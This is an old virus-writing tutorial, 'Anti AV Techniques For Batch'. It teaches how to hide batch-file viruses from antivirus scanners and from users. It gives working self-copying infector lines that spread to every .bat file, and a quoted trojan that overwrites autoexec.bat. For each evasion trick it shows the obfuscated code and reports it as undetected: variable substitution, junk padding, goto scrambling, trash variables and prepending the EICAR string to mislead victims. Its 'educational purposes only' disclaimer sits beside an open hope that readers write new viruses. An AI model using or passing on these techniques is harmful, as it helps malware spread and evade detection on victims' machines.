                             
                                  @*$%$#X5O!P%@AP[4\PZX54(P^)7CC)7}$
                                  $                                0
                                  @           TUTORIAL:            #
                                  U                                ^
                                  )  Anti AV Techniques For Batch  $
                                  *                                f
                                  R              by                *
                                  !                                0
                                  2        cOrRuPt G3n3t!x         #
                                  &                                %
                                  *$%$#X5O!P%@AP[4\PZX54(P^)7CC)7}$%



   In order to make our batch file virus a little more inconspicuos, unreadable or undetectable
   we use batch encryption techniques to fool AV's and people trying read or decypher our code.
   There are many different ways and today i'll explain all the possible ways i know for batch
   encryption and AV & AV heuristics fooling. I used ESET NOD32 Anti-Virus for its great herustics
   capabilities and Avast4 Professional Edition for normal detection. Please remember all techniques
   have been tested on Windows Vista and work!
 

  1)EICAR Test File:
   ----------------

   AV companies needed a way to test whether their product works on the users computer but
   without bringing harm to it, so EICAR was born, a universal string of code that will set off
   all AV's but will display 'EICAR TEST FILE NOT A VIRUS' or something similar, so we therefore,
   add this string to the begining of our code in hopes that the user will let it run after seeing that
   its a test file and not a virus. This will help when infecting people with limited knowlegde on viruses
   so definitely not a great technique when compared to others but non the less, here's the string for the
   EICAR 'Virus' which should be added to the beginning of your code:

  -------------------------------[Cut Here]--------------------------------------
  X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* 
  -------------------------------[Cut Here]--------------------------------------


  2)Fake Bytes:
   -----------

   All AV's will only scan the first 1000 bytes of a batch file for any malicious code, so what do we do?
   We add a whole bunch of letters in the first 1000 bytes of our code, pretty easy and an excellent
   way to bypass scanners and in some cases AV heurstics. So here is exactly a 1000 bytes of useless code
   which should be pasted at the beginning of your code:

  -------------------------------[Cut Here]--------------------------------------
  jfnvjdfvbdfrjcedjcndskcjlewkjdelkasusywkiqwndsjhcgbdkisknckichcdsjyefgwiednnauxxbjnkaskjgbuhyhdgddr
  djdchcvnfdhvjknvjknvfbdfhvbdfjncfdnfhvjrhskjfnmaskldnchfvbgfvffscdjfbnjehcfnjhcbjhnvdjuknvchdhbhvhf
  fdgvcdfgcvjhvbnfvfdhbfvdjnfvdnbjfvnjgbnjkfvsjlsfdjhfsndsajkfdsvefeyufguyshduygfbdbcyufreubfuyhfdbk
  fndsfungcuhfjhcvnhsfdncjsjzlixldjfouyfhfrufmrnjhggvcnnfvdeyhfyfghnfguhfuyndfhfdrsognfdhjfdyfdhfdhg
  fhvbdh7rhuigfuhgudjfdujguighsudgduhgjugsifdkgiojfdhiudfgmnjhdgufhuigfjguijgukhgkjgufdhgjfugfchghjh
  hsbdfjdrbfjdbgvfovngkllksfjbnmgkjvnvjkgfnkbfgvhnfgijgfjknfghjgffghdunvuhnuihgfgjifugjiuhdruiryhgui
  dsbdyhceyifgbycgnjhfhjhvfbdgjhnhjhsdhbgsftrhgbvsrulsfkewajfreihnrnusrnvcuhiurgfeuygfruyfgybfdbkjkd
  dscgfbdofnjkfhnkjfnkovmhuihgudljcugrhnuhvgvnuivgfhgdfigjngnklvtghnmgiojgfnkjgfhnfhngfvjnkfgvlkgfng
  fdkbsdcfhnmvghnfvkjfjkgfpkogjroisjoersmcetkuntbggkhgjhdlewrlkjrhjiurnvuinvynbtrhurenyviuntruirtunv
  dsuifhuyafgbycfgruyfgnucafipjnfnjkhnfidhfvmdkhzkdlhfnuygjkdngtfrjhnguhyghsduvbgrjkhvsriulkghnkjhgu
  -------------------------------[Cut Here]--------------------------------------


  3)Standard Encryption Technique (SET):
    -----------------------------------

   As the acronym would suggest this is a technique whereby the 'set' command in MS-DOS is used
   to encrypt the batch file and make it hard for the AV to analyze and for the user to interpret.
   we do this by assigning a variable to a set command, this might not make sense but see below:

   This was detected as 'BAT/Silly.D Virus' by ESET NOD32:
  -------------------------------[Cut Here]--------------------------------------
  for %%a in (*.bat) do copy %0 %%a
  -------------------------------[Cut Here]--------------------------------------

   Now by encrypting vairbles: for, in, do and copy it will become undetected. Although it was not
   detected by encrypting only one of the variables this will not always be the case.
   This was not detected by ESET NOD32 or Avast4:
  -------------------------------[Cut Here]--------------------------------------
  set a=for
  set b=in
  set c=do
  set d=copy
  %a% %%a %b% (*.bat) %c% %d% %0 %%a
  -------------------------------[Cut Here]--------------------------------------
 
   This will be compilcated for others to read but not for people with a knowledge of batch so what
   you could do is make the set encryption appear at the bottom of your code and then begin to read the top,
   this will work well with large code as the user will have to scroll down to see the set encryption. You
   can do this simply by having a 'GOTO' command that will goto the decryption parameter before returning
   to the encrypted code, using more then one variable will make it much harder to read! See below:
  -------------------------------[Cut Here]--------------------------------------
  @echo off
  GOTO decrypt
  :infect
  %a% %%a %b% (*.bat) %c% %d% %0 %%a
  %a% %%a %b% (C:\*.bat) %c% %d% %0 %%a
  %a% %%a %b% (C:\Windows*.bat) %c% %d% %0 %%a
  exit
  :decrypt
  set a=for
  set b=in
  set c=do
  set d=copy
  goto infect
  -------------------------------[Cut Here]--------------------------------------


  4)Character Overflow:
    -------------------

   Fisrt off thanks to DvL for this idea and now lets begin. This is just an awesome name i gave to
   a Anti AV technique that will help by hiding your lines and fool the AV from detecting the right tokens
   in your batch. All you need to do is add characters betwee each line of your code, it can also be numbers
   I used the character 'n' as it was used in the legendary SASSER worm to cause a buffer overrun.
   The only snag is the virus has to have more then 3 or 4 lines to work effectively.

   This is a virus by Ratty which was detected as 'BAT/Ratty.Substcde.A Trojan' by ESET NOD32
  -------------------------------[Cut Here]--------------------------------------
  @echo off
  ctty nul
  @echo subst e: a:\ > c:\autoexec.bat
  @echo subst d: a:\ >> c:\autoexec.bat
  @echo subst c: a:\ >> c:\autoexec.bat
  ctty con
  cls
  -------------------------------[Cut Here]--------------------------------------

   When using the Character Overflow technique it was not detected by ESET NOD32:
  -------------------------------[Cut Here]--------------------------------------
  nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
  @echo off
  nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
  ctty nul
  nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
  @echo subst e: a:\ > c:\autoexec.bat
  nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
  @echo subst d: a:\ >> c:\autoexec.bat
  nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
  @echo subst c: a:\ >> c:\autoexec.bat
  nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
  ctty con
  nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
  cls
  nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
  -------------------------------[Cut Here]--------------------------------------


  5)GOTO Confuser:
    --------------

   This is a bit impractical as it takes extremely long and is pretty confusing depending on the size of your code.
   It only works with code that is longer then 5 lines. What it does is confuse the AV by giving
   multiple goto commands so the strings of the virus is seperate and not read as a single token so it wont be detected.

   This is a virus by Ratty which was detected as 'BAT/Ratty.Substcde.A Trojan' by ESET NOD32:
  -------------------------------[Cut Here]--------------------------------------
  @echo off
  ctty nul
  @echo subst e: a:\ > c:\autoexec.bat
  @echo subst d: a:\ >> c:\autoexec.bat
  @echo subst c: a:\ >> c:\autoexec.bat
  ctty con
  cls
  -------------------------------[Cut Here]--------------------------------------

   Using the GOTO confuser it was not detected by ESET NOD32:
  -------------------------------[Cut Here]--------------------------------------
  @echo off
  goto a
  :f
  ctty nul
  goto b
  :l
  @echo subst e: a:\ > c:\autoexec.bat
  goto c
  :m
  @echo subst d: a:\ >> c:\autoexec.bat
  goto d
  :r
  @echo subst c: a:\ >> c:\autoexec.bat
  ctty con
  cls
  :a
  goto f
  :b
  goto l
  :c
  goto m
  :d
  goto r
  -------------------------------[Cut Here]--------------------------------------


  6)Trash Code:
    -----------

   This refers to lines of code that simply do nothing, but as far as the AV is concerned its working code
   so wat do we do with this in mind? We put meaningless garbage between our actual code, it is however
   important to note that the lines you are using for trash code is not used for anything:

  This was detected as 'BAT/Silly.D Virus' by ESET NOD32:
  -------------------------------[Cut Here]--------------------------------------
  for %%a in (*.bat) do copy %0 %%a
  -------------------------------[Cut Here]--------------------------------------

   When using garbage or trash code it was not detected:
  -------------------------------[Cut Here]--------------------------------------
  set trash=
  %trash% for %trash% %%a %trash% in %trash% (*.bat) %trash% do %trash% copy %trash% %0 %trash% %%a
  -------------------------------[Cut Here]--------------------------------------
   In the first line we made sure trash was set to nothing then added the code to the virus it worked
   perfectly without being detected!



  7)Fake SET technique:
    ------------------

   Although our Standard Encryption technique is strong enough for heuristics and AV's this technique will make it
   much harder to be found and also to be debugged. This technique involves the "set %variable%=%command" except
   we shall give the variables fake commands and then set the real commands see below for more clarity:
   -------------------------------[Cut Here]--------------------------------------
   set acv=ren
   set acv=for
   set acv=copy
   set axv=yes
   set axv=for
   set lmno=ggg
   set lmno=in 
   %axv% %%a %lmno% (*.bat) do %acv% %0 %%a
   -------------------------------[Cut Here]--------------------------------------
   as you can see we renamed the vairble a few times which begins to get tricky especially when 
   the code is long! No AV will detect this as it has no set string, and it will give heuristics
   a hard time to emulate the code!



   I Hope to see you using some of these techniques in up and coming batch file virii! If there is any problems with my code
   or you have a question just e-mail me and i'll gladly help. Remember this is for educational purposes only do not use
   maliciously! KEEP On Batching... :)



  [?]Contact Me:
     -----------

  [@]immortalassassin@rocketmail.com